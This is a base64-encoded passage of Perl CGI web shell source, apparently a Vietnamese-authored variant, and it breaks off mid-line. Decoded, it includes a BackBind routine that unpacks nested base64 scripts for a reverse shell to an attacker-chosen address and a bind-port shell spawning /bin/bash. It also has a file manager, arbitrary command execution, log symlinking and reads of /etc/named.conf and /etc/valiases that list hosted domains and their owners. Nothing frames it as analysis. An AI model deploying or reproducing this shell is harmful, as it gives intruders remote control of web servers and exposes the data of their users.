CnN1YiBCYWNrQmluZAp7Cgl1c2UgTUlNRTo6QmFzZTY0OwoJdXNlIFNvY2tldDsJCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7CgkkYmluZHBlcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdVMjlqYTJWME93MEtKRUZTUjBNOVFFRlNSMVk3RFFva2NHOXlkQWs5SUNSQlVrZFdXekJkT3cwS0pIQnliM1J2Q1QwZ1oyVjBjSEp2ZEc5aWVXNWhiV1VvSjNSamNDY3BPdzBLSkZOb1pXeHNDVDBnSWk5aWFXNHZZbUZ6YUNJN0RRcHpiMk5yWlhRb1UwVlNWa1ZTTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2dKSEJ5YjNSdktXOXlJR1JwWlNBaWMyOWphMlYwT2lRaElqc05Dbk5sZEhOdlkydHZjSFFvVTBWU1ZrVlNMQ0JUVDB4ZlUwOURTMFZVTENCVFQxOVNSVlZUUlVGRVJGSXNJSEJoWTJzb0ltd2lMQ0F4S1NsdmNpQmthV1VnSW5ObGRITnZZMnR2Y0hRNklDUWhJanNOQ21KcGJtUW9VMFZTVmtWU0xDQnpiMk5yWVdSa2NsOXBiaWdrY0c5eWRDd2dTVTVCUkVSU1gwRk9XU2twYjNJZ1pHbGxJQ0ppYVc1a09pQWtJU0k3RFFwc2FYTjBaVzRvVTBWU1ZrVlNMQ0JUVDAxQldFTlBUazRwQ1FsdmNpQmthV1VnSW14cGMzUmxiam9nSkNFaU93MEtabTl5S0RzZ0pIQmhaR1J5SUQwZ1lXTmpaWEIwS0VOTVNVVk9WQ3dnVTBWU1ZrVlNLVHNnWTJ4dmMyVWdRMHhKUlU1VUtRMEtldzBLQ1c5d1pXNG9VMVJFU1U0c0lDSStKa05NU1VWT1ZDSXBPdzBLQ1c5d1pXNG9VMVJFVDFWVUxDQWlQaVpEVEVsRlRsUWlLVHNOQ2dsdmNHVnVLRk5VUkVWU1Vpd2dJajRtUTB4SlJVNVVJaWs3RFFvSmMzbHpkR1Z0S0NKMWJuTmxkQ0JJU1ZOVVJrbE1SVHNnZFc1elpYUWdVMEZXUlVoSlUxUWdPMlZqYUc4Z0oxc3JYU0JUZVhOMFpXMXBibVp2T2lBbk95QjFibUZ0WlNBdFlUdGxZMmh2TzJWamFHOGdKMXNyWFNCVmMyVnlhVzVtYnpvZ0p6c2dhV1E3WldOb2J6dGxZMmh2SUNkYksxMGdSR2x5WldOMGIzSjVPaUFuT3lCd2QyUTdaV05vYnpzZ1pXTm9ieUFuV3l0ZElGTm9aV3hzT2lBbk95UlRhR1ZzYkNJcE93MEtDV05zYjNObEtGTlVSRWxPS1RzTkNnbGpiRzl6WlNoVFZFUlBWVlFwT3cwS0NXTnNiM05sS0ZOVVJFVlNVaWs3RFFwOURRbz0iOwoKCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307CgkkQ2xpZW50UG9ydCA9IGludCgkaW57J2NsaWVudHBvcnQnfSk7CglpZigkQ2xpZW50UG9ydCBlcSAwKQoJewoJCXJldHVybiAmQmFja0JpbmRGb3JtOwoJfWVsc2lmKCEkQ2xpZW50QWRkciBlcSAiIikKCXsKCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiYWNrcGVybCk7CgkJaWYoLXcgIi90bXAvIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JhY2tjb25uZWN0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiYWNrY29ubmVjdC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmFja2Nvbm5lY3QucGwgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX1lbHNlCgl7CgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmluZHBlcmwpOwoJCWlmKC13ICIvdG1wIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JpbmRwb3J0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiaW5kcG9ydC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmluZHBvcnQucGwgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX0KfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgIEFycmF5IExpc3QgRGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJtRGlyKCQpIAp7CglteSAkZGlyID0gc2hpZnQ7CiAgICBpZihvcGVuZGlyKERJUiwkZGlyKSkKCXsKCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkKCQl7CgkJCWlmKCgkZmlsZSBuZSAiLiIpICYmICgkZmlsZSBuZSAiLi4iKSkKCQkJewoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7CgkJCQlpZigtZCAkZmlsZSkKCQkJCXsKCQkJCQkmUm1EaXIoJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXVubGluaygkZmlsZSk7CgkJCQl9CgkJCX0KCQl9CgkJY2xvc2VkaXIoRElSKTsKCX0KCWlmKCFybWRpcigkZGlyKSkKCXsKCQkKCX0KfQpzdWIgRmlsZU93bmVyKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJHVpZCwkZ2lkKSA9IChzdGF0KCRmaWxlKSlbNCw1XTsKCQlpZigkV2luTlQpCgkJewoJCQlyZXR1cm4gIj8/PyI7CgkJfQoJCWVsc2UKCQl7CgkJCSRuYW1lPWdldHB3dWlkKCR1aWQpOwoJCQkkZ3JvdXA9Z2V0Z3JnaWQoJGdpZCk7CgkJCXJldHVybiAkbmFtZS4iLyIuJGdyb3VwOwoJCX0KCX0KCXJldHVybiAiPz8/IjsKfQpzdWIgUGFyZW50Rm9sZGVyKCQpCnsKCW15ICRwYXRoID0gc2hpZnQ7CglteSAkQ29tbSA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkIC4uIi4kQ21kU2VwLiRDbWRQd2Q7CgljaG9wKCRwYXRoID0gYCRDb21tYCk7CglyZXR1cm4gJHBhdGg7Cn0Kc3ViIEZpbGVQZXJtcygkKQp7CglteSAkZmlsZSA9IHNoaWZ0OwoJbXkgJHVyID0gIi0iOwoJbXkgJHV3ID0gIi0iOwoJaWYoLWUgJGZpbGUpCgl7CgkJaWYoJFdpbk5UKQoJCXsKCQkJaWYoLXIgJGZpbGUpeyAkdXIgPSAiciI7IH0KCQkJaWYoLXcgJGZpbGUpeyAkdXcgPSAidyI7IH0KCQkJcmV0dXJuICR1ciAuICIgLyAiIC4gJHV3OwoJCX1lbHNlCgkJewoJCQkkbW9kZT0oc3RhdCgkZmlsZSkpWzJdOwoJCQkkcmVzdWx0ID0gc3ByaW50ZigiJTA0byIsICRtb2RlICYgMDc3NzcpOwoJCQlyZXR1cm4gJHJlc3VsdDsKCQl9Cgl9CglyZXR1cm4gIjAwMDAiOwp9CnN1YiBGaWxlTGFzdE1vZGlmaWVkKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJGxhKSA9IChzdGF0KCRmaWxlKSlbOV07CgkJKCRkLCRtLCR5LCRoLCRpKSA9IChsb2NhbHRpbWUoJGxhKSlbMyw0LDUsMiwxXTsKCQkkeSA9ICR5ICsgMTkwMDsKCQlAbW9udGggPSBxdy8xIDIgMyA0IDUgNiA3IDggOSAxMCAxMSAxMi87CgkJJGxtdGltZSA9IHNwcmludGYoIiUwMmQvJXMvJTRkICUwMmQ6JTAyZCIsJGQsJG1vbnRoWyRtXSwkeSwkaCwkaSk7CgkJcmV0dXJuICRsbXRpbWU7Cgl9CglyZXR1cm4gIj8/PyI7Cn0Kc3ViIEZpbGVTaXplKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZiAkZmlsZSkKCXsKCQlyZXR1cm4gLXMgJGZpbGU7Cgl9CglyZXR1cm4gIjAiOwoKfQpzdWIgUGFyc2VGaWxlU2l6ZSgkKQp7CglteSAkc2l6ZSA9IHNoaWZ0OwoJaWYoJHNpemUgPD0gMTAyNCkKCXsKCQlyZXR1cm4gJHNpemUuICIgQiI7Cgl9CgllbHNlCgl7CgkJaWYoJHNpemUgPD0gMTAyNCoxMDI0KSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4wMmYiLCRzaXplIC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIEtCIjsKCQl9CgkJZWxzZSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4yZiIsJHNpemUgLyAxMDI0IC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIE1CIjsKCQl9Cgl9Cn0Kc3ViIHRyaW0oJCkKewoJbXkgJHN0cmluZyA9IHNoaWZ0OwoJJHN0cmluZyA9fiBzL15ccysvLzsKCSRzdHJpbmcgPX4gcy9ccyskLy87CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgQWRkU2xhc2hlcygkKQp7CglteSAkc3RyaW5nID0gc2hpZnQ7Cgkkc3RyaW5nPX4gcy9cXC9cXFxcL2c7CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgTGlzdERpcgp7CglteSAkcGF0aCA9ICRDdXJyZW50RGlyLiRQYXRoU2VwOwoJJHBhdGg9fiBzL1xcXFwvXFwvZzsKCW15ICRyZXN1bHQgPSAiPGZvcm0gbmFtZT0nZicgYWN0aW9uPSckU2NyaXB0TG9jYXRpb24nPjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+UGF0aDogWyAiLiZBZGRMaW5rRGlyKCJndWkiKS4iIF0gPC9zcGFuPjxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdkJyBzaXplPSc0MCcgdmFsdWU9JyRDdXJyZW50RGlyJyAvPjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2EnIHZhbHVlPSdndWknPjxpbnB1dCBjbGFzcz0nc3VibWl0JyB0eXBlPSdzdWJtaXQnIHZhbHVlPSdDaGFuZ2UnPjwvZm9ybT4iOwoJaWYoLWQgJHBhdGgpCgl7CgkJbXkgQGZuYW1lID0gKCk7CgkJbXkgQGRuYW1lID0gKCk7CgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQoJCXsKCQkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpCgkJCXsKCQkJCSRmPSRwYXRoLiRmaWxlOwoJCQkJaWYoLWQgJGYpCgkJCQl7CgkJCQkJcHVzaChAZG5hbWUsJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXB1c2goQGZuYW1lLCRmaWxlKTsKCQkJCX0KCQkJfQoJCQljbG9zZWRpcihESVIpOwoJCX0KCQlAZm5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZm5hbWU7CgkJQGRuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGRuYW1lOwoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4KCgkJPHRyIHN0eWxlPSdiYWNrZ3JvdW5kLWNvbG9yOiAjM2UzZTNlJz48dGg+RmlsZSBOYW1lPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjEwMHB4Oyc+RmlsZSBTaXplPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+T3duZXI8L3RoPgoJCTx0aCBzdHlsZT0nd2lkdGg6MTAwcHg7Jz5QZXJtaXNzaW9uPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+TGFzdCBNb2RpZmllZDwvdGg+CgkJPHRoIHN0eWxlPSd3aWR0aDoyNjBweDsnPkFjdGlvbjwvdGg+PC90cj4iOwoJCW15ICRzdHlsZT0ibGluZSI7CgkJbXkgJGk9MDsKCQlmb3JlYWNoIG15ICRkIChAZG5hbWUpCgkJewoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOwoJCQkkZCA9ICZ0cmltKCRkKTsKCQkJJGRpcm5hbWU9JGQ7CgkJCWlmKCRkIGVxICIuLiIpIAoJCQl7CgkJCQkkZCA9ICZQYXJlbnRGb2xkZXIoJHBhdGgpOwoJCQl9CgkJCWVsc2lmKCRkIGVxICIuIikgCgkJCXsKCQkJCSRkID0gJHBhdGg7CgkJCX0KCQkJZWxzZSAKCQkJewoJCQkJJGQgPSAkcGF0aC4kZDsKCQkJfQoJCQkkcmVzdWx0IC49ICI8dHIgY2xhc3M9JyRzdHlsZSc+CgoJCQk8dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+PGEgIGhyZWY9Jz9hPWd1aSZkPSIuJGQuIic+WyAiLiRkaXJuYW1lLiIgXTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZD5ESVI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz4iLiZGaWxlT3duZXIoJGQpLiI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7JyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRkKS4iJywnIi4kZGlybmFtZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oIi4kaS4iLCciLiRkaXJuYW1lLiInKVwiID4iLiZGaWxlUGVybXMoJGQpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZCkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZGlybmFtZScsJyIuJkFkZFNsYXNoZXMoJkFkZFNsYXNoZXMoJGQpKS4iJylcIj5SZW5hbWU8L2E+ICB8IDxhIG9uY2xpY2s9XCJpZighY29uZmlybSgnUmVtb3ZlIGRpcjogJGRpcm5hbWUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9JHBhdGgmcmVtb3ZlPSRkaXJuYW1lJz5SZW1vdmU8L2E+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8L3RyPiI7CgkJCSRpKys7CgkJfQoJCWZvcmVhY2ggbXkgJGYgKEBmbmFtZSkKCQl7CgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlPSRmOwoJCQkkZiA9ICRwYXRoLiRmOwoJCQkkdmlldyA9ICI/ZGlyPSIuJHBhdGguIiZ2aWV3PSIuJGY7CgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7Jz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4kcGF0aC4iJmM9ZWRpdCUyMCIuJGZpbGUuIic+Ii4kZmlsZS4iPC9hPjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkPiIuJlBhcnNlRmlsZVNpemUoJkZpbGVTaXplKCRmKSkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPiIuJkZpbGVPd25lcigkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGYpLiInLCciLiRmaWxlLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgkaSwnJGZpbGUnKVwiID4iLiZGaWxlUGVybXMoJGYpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiRwYXRoLiImYz1lZGl0JTIwIi4kZmlsZS4iJz5FZGl0PC9hPiB8IDxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZmlsZScsJ2YnKVwiPlJlbmFtZTwvYT4gfCA8YSBocmVmPSc/YT1kb3dubG9hZCZvPWdvJmY9Ii4kZi4iJz5Eb3dubG9hZDwvYT4gfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBmaWxlOiAkZmlsZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0kcGF0aCZyZW1vdmU9JGZpbGUnPlJlbW92ZTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsKCQkJJGkrKzsKCQl9CgkJJHJlc3VsdCAuPSAiPC90YWJsZT48L2Rpdj4iOwoJfQoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRyeSB0byBWaWV3IExpc3QgVXNlcgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBWaWV3RG9tYWluVXNlcgp7CglvcGVuIChkb21haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJbXkgQGNuenMgPSA8ZG9tYWlucz47CgljbG9zZSBkMG1haW5zOwoJbXkgJHN0eWxlPSJsaW5lIjsKCW15ICRyZXN1bHQ9IjxoNT48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+SG9hbmcgU2EgLSBUcnVvbmcgU2E8L2ZvbnQ+PC9oNT4iOwoJaWYgKCRlcnIpCgl7CgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7CgkJcmV0dXJuICRyZXN1bHQ7Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJzx0YWJsZT48dHI+PHRoPkRvbWFpbnM8L3RoPiA8dGg+VXNlcjwvdGg+PC90cj4nOwoJfQoJZm9yZWFjaCBteSAkb25lIChAY256cykKCXsKCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCXsJCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlbmFtZT0gIi9ldGMvdmFsaWFzZXMvIi4kb25lOwoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCSRyZXN1bHQgLj0gJzx0ciBjbGFzcz0iJHN0eWxlIiB3aWR0aD01MCU+PHRkPicuJG9uZS4nIDwvdGQ+PHRkPiAnLiRvd25lci4nPC90ZD48L3RyPic7CgkJfQoJfQoJJHJlc3VsdCAuPSAnPC90YWJsZT4nOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFZpZXcgTG9nCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFZpZXdMb2cKewoJaWYoJFdpbk5UKQoJewoJCXJldHVybiAiPGgyPjxmb250IHN0eWxlPSdmb250OiAyMHB0IFZlcmRhbmE7Y29sb3I6ICNmZjk5MDA7Jz5Eb24ndCBydW4gb24gV2luZG93czwvZm9udD48L2gyPiI7Cgl9CglteSAkcmVzdWx0PSI8dGFibGU+PHRyPjx0aD5QYXRoIExvZzwvdGg+PHRoPlN1Ym1pdDwvdGg+PC90cj4iOwoJbXkgQHBhdGhsb2c9KAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nJywKCQkJCScvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2cnLAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZycKCQkJCSk7CglteSAkaT0wOwoJbXkgJHBlcm1zOwoJbXkgJHNsOwoJZm9yZWFjaCBteSAkbG9nIChAcGF0aGxvZykKCXsKCQlpZigtdyAkbG9nKQoJCXsKCQkJJHBlcm1zPSJPSyI7CgkJfWVsc2UKCQl7CgkJCWNob3AoJHNsID0gYGxuIC1zICRsb2cgZXJyb3JfbG9nXyRpYCk7CgkJCWlmKCZ0cmltKCRscykgZXEgIiIpCgkJCXsKCQkJCWlmKC1yICRscykKCQkJCXsKCQkJCQkkcGVybXM9Ik9LIjsKCQkJCQkkbG9nPSJlcnJvcl9sb2dfIi4kaTsKCQkJCX0KCQkJfWVsc2UKCQkJewoJCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7CgkJCX0KCQl9CgkJJHJlc3VsdCAuPTw8RU5EOwoJCTx0cj4KCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgoJCQk8dGQ+PGlucHV0IHR5cGU9InRleHQiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsb2dfJGknKS52YWx1ZT0nbGVzcyAnICsgdGhpcy52YWx1ZTsiIHZhbHVlPSIkbG9nIiBzaXplPSc1MCcvPjwvdGQ+CgkJCTx0ZD48aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVHJ5IiAvPjwvdGQ+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJsb2dfJGkiIG5hbWU9ImMiIHZhbHVlPSJsZXNzICRsb2ciLz4KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiIC8+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciIgLz4KCQkJPC9mb3JtPgoJCQk8dGQ+JHBlcm1zPC90ZD4KCgkJPC90cj4KRU5ECgkJJGkrKzsKCX0KCSRyZXN1bHQgLj0iPC90YWJsZT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiZSZWFkUGFyc2U7CiZHZXRDb29raWVzOwoKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9OwokUnVuQ29tbWFuZCA9ICRpbnsnYyd9OwokVHJhbnNmZXJGaWxlID0gJGlueydmJ307CiRPcHRpb25zID0gJGlueydvJ307CiRBY3Rpb24gPSAkaW57J2EnfTsKCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAmdHJpbSgkaW57J2QnfSk7CiMgbWFjIGRpbmggeHVhdCB0aG9uZyB0aW4gbmV1IGtvIGNvIGxlbmggbmFvIQokUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSIgaWYoJFJ1bkNvbW1hbmQgZXEgIiIpOwpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7CgokTG9nZ2VkSW4gPSAkQ29va2llc3snU0FWRURQV0QnfSBlcSAkUGFzc3dvcmQ7CgppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgCQkjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luCnsKCSZQZXJmb3JtTG9naW47Cn1lbHNpZigkQWN0aW9uIGVxICJndWkiKSAjIEdVSSBkaXJlY3RvcnkKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCEkV2luTlQpCgl7CgkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCWlmKCEoJGNobW9kIGVxIDApKQoJCXsKCQkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCQkkZmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kVHJhbnNmZXJGaWxlOwoJCQljaG9wKCRyZXN1bHQ9IGBjaG